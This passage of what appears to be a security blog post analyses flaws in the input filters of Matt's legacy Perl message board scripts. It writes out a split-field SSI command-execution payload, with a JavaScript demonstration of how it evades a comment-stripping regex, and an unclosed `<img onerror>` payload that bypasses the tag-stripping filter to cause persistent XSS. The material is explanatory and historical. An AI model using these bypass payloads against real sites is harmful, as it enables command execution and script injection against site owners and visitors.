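var strip = function (s) { return s.replace(/<!--[\s\S]*-->/g, ''); };

var subject = '<!--#exec cmd="ls -al" echo=\'';
var body = '\' -->';

console.log(strip(subject));                         // unchanged: no closing -->
console.log(strip(body));                            // unchanged: no opening <!--
console.log(strip(subject) + ' ... ' + strip(body)); // the complete SSI survives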

Reassembled on the rendered page, that would effectively run SSI code. Full command execution! Thankfully SSI is all but dead these days, not to mention that Matt’s project is on its deathbed, so the real risk is negligible. Now let’s look a little lower:

$value =~ s/<([^>]|\n)*>//g;

This attempts to block any XSS. Ironically it should also block SSI, but let’s not get into the specifics here too much. It suffers from a similar issue.

Body is: <img src="" onerror='alert("XSS");'

Unlike with SSI, I don’t have to worry about there being a closing comment tag – end angle brackets are a dime a dozen on any HTML page, which means that no matter what, this persistent XSS will fire on the page in question. While not as good as full command execution, it does work in modern browsers more reliably than SSI does on websites.

As I kept looking I found all kinds of other issues that would lead the board to get spammed like crazy, and in practice when I went hunting for the board on the Internet all I could find were either heavily modified boards that were password protected, or broken boards. That’s probably the only reason those thousands of boards aren’t fully compromised.

It’s an interesting reminder of exactly where we have come from and why things are so broken. We’ve inherited a lot of code, and even I still have snippets of Matt’s code buried all over the web in long-forgotten but still functional pages. We’ve inherited a lot of vulnerabilities, and our knowledge has substantially increased. It’s fascinating to see how bad things really were, and how little security there was when the web was in its infancy.